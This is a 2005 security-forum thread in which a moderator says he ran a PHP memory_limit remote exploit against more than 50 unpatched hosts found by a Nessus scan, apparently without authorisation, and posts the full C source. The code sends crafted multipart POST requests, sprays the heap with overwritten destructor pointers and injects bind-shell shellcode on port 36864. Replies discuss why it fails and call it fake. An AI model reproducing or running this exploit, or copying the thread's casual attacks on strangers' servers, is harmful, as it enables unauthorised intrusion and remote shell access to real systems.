|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 63
Members: 0
Total: 63
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Remote exploit for the php memory_limit FAKE??????? xD |
|
Posted: Sun Jan 30, 2005 2:25 am |
|
|
LINUX |
Moderator |
|
|
Joined: May 24, 2004 |
Posts: 404 |
Location: Caiman |
|
|
|
|
|
|
i run nessus and detect multiple host in php 4 (<= 4.3.7) and php 5 (<= 5.0.0RC3) without patching
I execute this exploit but not work. I have my suspicion that this is fake
root@localhostxpl]# ./fuck
Stage 1: Filling mem with bad pdestructor ... DONE
Stage 2: Triggering mem_limit now ... DONE
Shell on port 36864
telnet victim.com 36864 and nothing xD, i test this in more 50 host and not connect never.
plz need help view original source
Code: | #include <stdio.h>
#include <string.h>
#include <winsock.h>
#define PORT 80
int sock;
struct sockaddr_in s;
char request1[]=
"POST ";
char request12[]="?a[1]=test HTTP/1.1\r\n"
"Host: ";
char request13[]="\r\n"
"User-Agent: mlxdebug\r\n"
"Accept: text/html\r\n"
"Connection: close\r\n"
"Pragma: no-cache\r\n"
"Cache-Control: no-cache\r\n"
"Content-Type: multipart/form-data; boundary=------------ \r\n BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB \r\n";
char request2[]=
"---------------264122487026375\r\n"
"Content-Length: 472\r\n"
"\r\n"
"-----------------------------264122487026375\r\n"
"Content-Disposition: form-data; name=\"a[][]\"\r\n"
"\r\n"
"TESTTESTTESTTESTTESTTESTTESTTESTTESTTES \r\n"
"\r\n"
"-----------------------------264122487026375--\r\n";
char request3[]=
"\r\n"
"User-Agent: mlxdebug\r\n"
"Accept: text/html\r\n"
"Connection: close\r\n"
"Pragma: no-cache\r\n"
"Cache-Control: no-cache\r\n"
"Content-Type: multipart/form-data; boundary=-------------";
char request4[]=
"---------------264122487026375\r\n"
"Content-Length: 472\r\n"
"\r\n"
"-----------------------------264122487026375\r\n"
"Content-Disposition: form-data; name=\"a[][]\"\r\n"
"\r\n"
"TESTTESTTESTTESTTESTTESTTESTTESTTESTTES \r\n"
"-----------------------------264122487026375--\r\n";
/*Ripped shellcode. Runs on port 36864*/
char shell[]=
"\xeb\x72\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c"
"\x40\x89\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\x43\xc6\x46"
"\x10\x10\x66\x89\x5e\x14\x88\x46\x08\x29\xc0\x89\xc2\x89"
"\x46\x18\xb0\x90\x66\x89\x46\x16\x8d\x4e\x14\x89\x4e\x0c"
"\x8d\x4e\x08\xb0\x66\xcd\x80\x89\x5e\x0c\x43\x43\xb0\x66"
"\xcd\x80\x89\x56\x0c\x89\x56\x10\xb0\x66\x43\xcd\x80\x86"
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0\x3f\x41\xcd\x80\xb0\x3f"
"\x41\xcd\x80\x88\x56\x07\x89\x76\x0c\x87\xf3\x8d\x4b\x0c"
"\xb0\x0b\xcd\x80\xe8\x89\xff\xff\xff/bin/sh";
struct url{
char *dns;
char *uri;
unsigned short port;
};
struct url parseurl(char *of)
{
struct url retour;
unsigned int taille;
char tmp;
retour.dns = 0x00;
retour.uri = 0x00;
retour.port = PORT ;
while( *of && (*of != ':'))
of++;
if(*of && *(of+1) && *(of+2))
{
if((*(of+1) != '/') || (*(of+2) != '/'))
return retour;
of += 3;
for(taille = 0; (of[taille] != '/') && (of[taille] != '\0') && (of[taille] != ':');taille++);
retour.dns = malloc(taille+1);
memcpy(retour.dns,of,taille);
retour.dns[taille] = '\0';
of += taille;
if(*of == ':')
{
of++;
for(taille = 0; (of[taille] != '/') && (of[taille] != '\0');taille++);
tmp = of[taille];
of[taille] = '\0';
if(taille)
retour.port = atoi(of);
of[taille] = tmp;
of += taille;
};
if(!*of)
{
retour.uri = malloc(2);
strcpy(retour.uri,"/");
}
else
{
retour.uri = malloc(strlen(of)+1);
strcpy(retour.uri,of);
};
};
return retour;
};
void help()
{
printf("use as: phpexp.exe http://site.com/phpinfo.php\nby Gyan Chawdhary (gunnu45@hotmail.com)*(felinemenace.org/~gyan)\n modif by slythers (win32)");
exit(0);
};
void xp_connect(char *ip,unsigned short port)
{
int tmp;
struct hostent *hoste;
int test;
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
printf("Cannot create socket\n");
exit(-1);
}
memset(&s, 0, sizeof(s));
if(!(hoste = gethostbyname(ip)))
s.sin_addr.s_addr = inet_addr(ip);
else
memcpy(&(s.sin_addr),hoste->h_addr,hoste->h_length);
s.sin_family = AF_INET ;
s.sin_port = htons(port);
if((connect(sock,(struct sockaddr *)&s,sizeof(struct sockaddr))) < 0)
{
printf("Cannot connect()\n");
exit(-1);
}
}
void xp_write(char *data)
{
if(send(sock, data, strlen(data),0) < 0)
{
printf("socket closed by distant server\n");
exit(-1);
}
}
void xp_receive()
{
int tmp;
char buffer[1024*2];
if ( (tmp = read(sock, buffer, sizeof(buffer)-1)) <= 0)
{
printf("read() failed\n");
exit(-1);
}
}
char fill[] = " \r\n %s \r\n ";
/*This function builds the main request. In destroy_uploaded_files_hash we
* need to pass zend_hash_apply to reach zend_hash_destroy.
* We set
* 1) ht->nApplyCount to 0x02020202 to pass HASH_PROTECT_RECURSION
* 2) p->pListNext = 0x00000000 to exit out of zend_hash_apply
* 3) ht->pDestructor = addr to nop+shellcode
* 0x402c22bc <zend_hash_destroy+184>: sub $0xc,%esp
* 0x402c22bf <zend_hash_destroy+187>: pushl 0x8(%esi)
* 0x402c22c2 <zend_hash_destroy+190>: call *%eax
* 0x402c22c4 <zend_hash_destroy+192>: add $0x10,%esp
*
* $eax = ht->pDestructor
*/
void build1(int size, int count)
{
char *p1, *p2;
char *b1, *b2;
int i;
int pot = 0xffffffff;
int got = 0x41414141;
int bot = 0x0818ef29; //0x0818ef78;//0x08189870; //0x402b6c08;
int sot = 0x02020202;
int ret = 0x081887a8;
b1 = (char *)malloc(size-8);
p1 = b1;
for (i=0; i<size-8; i+=36)
{
*( (int **)p1 ) = (int *)( pot );
p1+=4;
*( (int **)p1 ) = (int *)( got );
p1+=4;
*( (int **)p1 ) = (int *)( bot );
p1+=4;
*( (int **)p1 ) = (int *)( ret );
p1+=4;
*( (int **)p1 ) = (int *)( bot );
p1+=4;
*( (int **)p1 ) = (int *)( got );
p1+=4;
*( (int **)p1 ) = (int *)( bot );
p1+=4;
*( (int **)p1 ) = (int *)( sot );
p1+=4;
}
b2 = (char *)malloc(size+1);
p2 = b2;
sprintf(p2, fill, b1);
for(i=0; i<count; i++)
xp_write(b2);
}
/*Test function for resetting php memory , does not work properly with
* php_normalize_heap function */
void build2(int size, int count)
{
char *p1, *p2;
char *b1, *b2;
int i;
b1 = (char *)malloc(size-8);
p1 = b1;
memset(p1, '\x42', size-8);
b2 = (char *)malloc(size+1);
p2 = b2;
sprintf(p2, fill, b1);
for(i=0; i<count; i++)
xp_write(b2);
}
/*TODO*/
char *php_normalize_heap()
{
return;
}
/*Builds our shellcode with NOP's and the mem interuption request*/
void build3(int size, int count)
{
char *p1, *p2;
char *b1, *b2;
int i;
int pot = 0x90909090;
b1 = (char *)malloc(size-8);
p1 = b1;
for (i=0; i<size-8-strlen(shell); i+=4) {
*( (int **)p1 ) = (int *)( pot );
p1+=4;
}
p1 = b1;
p1+= size - 8 - strlen(shell);
strncpy(p1, shell, strlen(shell));
b2 = (char *)malloc(size+1);
p2 = b2;
sprintf(p2, fill, b1);
for(i=0; i<count; i++)
xp_write(b2);
}
void exploit(char *eip,char *euri,unsigned short eport)
{
int i;
printf("Stage 1: Filling mem with bad pdestructor ... ");
for (i=0; i< 5; i++)
{
xp_connect(eip,eport);
xp_write(request1);
xp_write(euri);
xp_write(request12);
xp_write(eip);
xp_write(request13);
build1(5000, 1);
xp_write(request2);
closesocket(sock);
}
printf("DONE\r\n");
printf("Stage 2: Triggering memory_limit now ... ");
xp_connect(eip,eport);
xp_write(request1);
xp_write(euri);
xp_write(request12);
xp_write(eip);
xp_write(request3);
build3(8192, 255);
build3(7265, 1);
xp_write(request4);
printf("DONE\r\n");
printf("Shell on port 36864\r\n");
}
main(int argc,char *argv[])
{
struct url wesh;
WSADATA wsadata;
if (WSAStartup(MAKEWORD(2, 0),&wsadata) != 0)
{
return 1;
};
if(argc < 2)
help();
wesh = parseurl(argv[1]);
if(!wesh.uri)
return;
exploit(wesh.dns,wesh.uri,wesh.port);
}
|
|
|
|
|
|
|
|
|
|
Posted: Sun Jan 30, 2005 10:07 am |
|
|
Heintz |
Valuable expert |
|
|
Joined: Jun 12, 2004 |
Posts: 88 |
Location: Estonia/Sweden |
|
|
|
|
|
|
after quick overview of the source it seems that it doesn't check if the exploitation actually worked, but rather shows progress, and you probably have to make request to page where phpinfo() is used. |
|
Last edited by Heintz on Sun Jan 30, 2005 7:42 pm; edited 1 time in total _________________ AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!" |
|
|
|
Posted: Sun Jan 30, 2005 4:42 pm |
|
|
mateusz |
Regular user |
|
|
Joined: Dec 05, 2004 |
Posts: 17 |
Location: Poland |
|
|
|
|
|
|
|
|
|
|
Posted: Sun Jan 30, 2005 4:58 pm |
|
|
LINUX |
Moderator |
|
|
Joined: May 24, 2004 |
Posts: 404 |
Location: Caiman |
|
|
|
|
|
|
yes men is = source not work
php limit memory is fake |
|
|
|
|
www.waraxe.us Forum Index -> Php
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|